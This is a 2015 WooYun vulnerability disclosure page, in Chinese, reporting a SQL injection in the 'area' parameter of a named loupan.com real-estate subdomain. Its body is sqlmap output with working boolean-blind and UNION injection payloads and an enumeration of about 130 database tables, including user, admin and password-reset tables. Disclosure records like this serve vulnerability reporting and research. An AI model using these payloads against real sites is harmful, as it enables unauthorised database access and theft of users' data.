当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146386

漏洞标题:楼盘网某站存在SQL注入漏洞

相关厂商:loupan.com

漏洞作者: 深度安全实验室

提交时间:2015-10-13 12:38

修复时间:2015-10-18 12:40

公开时间:2015-10-18 12:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://dz.loupan.com/index.php?apartments=0&area=1&c=house&decorate=0&existing=0&feature=0&keywords=&m=get_house_combox_list&page=1&price=0&property=0&state=0&subway=0 注入点:area

111.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: area (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: apartments=0&area=(SELECT (CASE WHEN (9929=9929) THEN 9929 ELSE 9929*(SELECT 9929 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&c=house&decorate=0&existing=0&feature=0&keywords=&m=get_house_combox_list&page=1&price=0&property=0&state=0&subway=0
    Type: UNION query
    Title: Generic UNION query (NULL) - 93 columns
    Payload: apartments=0&area=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7071,0x724c7855684d436d7473,0x7162626b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &c=house&decorate=0&existing=0&feature=0&keywords=&m=get_house_combox_list&page=1&price=0&property=0&state=0&subway=0
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
Database: loupan2013
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| lp_attachments                     | 23609498 |
| lp_news_info                       | 1967233 |
| lp_news                            | 1966286 |
| lp_admin_log                       | 1397571 |
| lp_group_buy_forms                 | 756624  |
| lp_news_position_relation          | 748327  |
| lp_houses_click_cache              | 619451  |
| lp_houses_pic_mating               | 541641  |
| lp_sms                             | 488226  |
| lp_houses_pic_draw                 | 348061  |
| lp_user_balance                    | 282380  |
| lp_users                           | 282301  |
| lp_users_link_accepter             | 282061  |
| lp_houses_trend                    | 214282  |
| lp_email_validate                  | 166620  |
| lp_houses_pic_focus                | 160629  |
| lp_user_operation_refresh          | 142533  |
| lp_houses_price_history            | 136254  |
| lp_houses_pic_real                 | 91498   |
| lp_user_operation_promotion        | 84684   |
| lp_houses_info                     | 77417   |
| lp_houses                          | 77415   |
| lp_notice_new_record               | 76727   |
| lp_houses_score                    | 75831   |
| lp_houses_pic_effect               | 61620   |
| lp_weixin_member                   | 55785   |
| lp_admin_sites                     | 53288   |
| lp_houses_pic_model                | 51613   |
| lp_houses_thumb_cache              | 49100   |
| lp_ci_sessions                     | 48690   |
| lp_toupiao                         | 39975   |
| lp_telephone_set_pool              | 31505   |
| lp_news_backup                     | 22363   |
| lp_ads_sites                       | 22344   |
| lp_broker                          | 22045   |
| lp_houses_comment                  | 20395   |
| lp_friend_links                    | 19422   |
| lp_cities_price                    | 18208   |
| lp_hlink_in_news                   | 17728   |
| lp_telephone_history               | 16868   |
| lp_houses_pic_traffic              | 14870   |
| lp_users_link_provider             | 14265   |
| lp_ads                             | 11602   |
| lp_friend_link_investigation_error | 10437   |
| lp_admin_roles_permissions         | 9895    |
| lp_user_operation_auto_refresh     | 7279    |
| lp_news_keywords                   | 5892    |
| lp_cities                          | 5574    |
| lp_houses_prices                   | 5199    |
| lp_user_collect                    | 4402    |
| lp_houses_telephone_set            | 3900    |
| lp_forum                           | 3205    |
| lp_fenxiao_referrals_history       | 2402    |
| lp_message                         | 1864    |
| lp_youhui_list                     | 1689    |
| lp_special_keywords_old            | 1420    |
| lp_houses_editor_comment           | 1273    |
| lp_fenxiao_clients                 | 999     |
| lp_user_balance_history            | 975     |
| lp_dissertation                    | 942     |
| lp_email_bind                      | 850     |
| lp_houses_attributes               | 749     |
| lp_sms_queue                       | 690     |
| lp_loan                            | 671     |
| lp_fenxiao_history                 | 646     |
| lp_fenxiao_clients_disengagement   | 569     |
| lp_admin                           | 555     |
| lp_admin_permissions               | 539     |
| lp_telephone_balance               | 511     |
| lp_sites                           | 509     |
| lp_group_buy                       | 494     |
| lp_email_get_password              | 437     |
| lp_houses_fenxiao                  | 394     |
| lp_friend_link_application         | 390     |
| lp_fenxiao_balance                 | 353     |
| lp_hpyold2new                      | 334     |
| lp_weixin_member_pio               | 319     |
| lp_fenxiao_referrals               | 308     |
| lp_fenxiao_new_broker              | 247     |
| lp_feedback                        | 244     |
| lp_ads_positions                   | 180     |
| lp_user_operation_top              | 178     |
| lp_frontend_pages_extra            | 167     |
| lp_contact_info                    | 165     |
| lp_information_gathering           | 155     |
| lp_weixin                          | 155     |
| lp_consultant                      | 154     |
| lp_user_atuo_refresh_templet       | 141     |
| lp_merchants                       | 139     |
| lp_houses_special                  | 106     |
| lp_admin_roles                     | 92      |
| lp_special_keywords_old_related    | 90      |
| lp_telephone_cost                  | 89      |
| lp_loupandai_msg                   | 71      |
| lp_fenxiao_user_collect            | 62      |
| lp_special_keywords_comments       | 46      |
| lp_notice_new                      | 45      |
| lp_dissertation_model              | 44      |
| lp_frontend_pages                  | 40      |
| lp_fenxiao_xieyi                   | 35      |
| lp_news_position                   | 33      |
| lp_news_categories                 | 32      |
| lp_houses_parameters               | 30      |
| lp_ads_pages                       | 27      |
| lp_telephone_recharge_history      | 22      |
| lp_friend_categories               | 15      |
| lp_special_keywords                | 14      |
| lp_telephone_cost_bak201569        | 14      |
| lp_fenxiao_view                    | 13      |
| lp_xfbiaoqian                      | 12      |
| lp_fenxiao_balance_history         | 10      |
| lp_telephone_cost_bak              | 7       |
| lp_youhui_class                    | 7       |
| lp_lottery                         | 5       |
| lp_customer_purchase_intention     | 4       |
| lp_user_combo                      | 3       |
| lp_fenxiao_site_msg                | 2       |
| lp_users_provider                  | 2       |
| coreseek_counter                   | 1       |
| lp_changelog                       | 1       |
| lp_friend_link_investigation_cycle | 1       |
| lp_lottery_type                    | 1       |
| lp_loupandai_token                 | 1       |
| lp_store                           | 1       |
| lp_syn_phone_config                | 1       |
| lp_telephone_queue                 | 1       |
| lp_users_accepter                  | 1       |
+------------------------------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-18 12:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无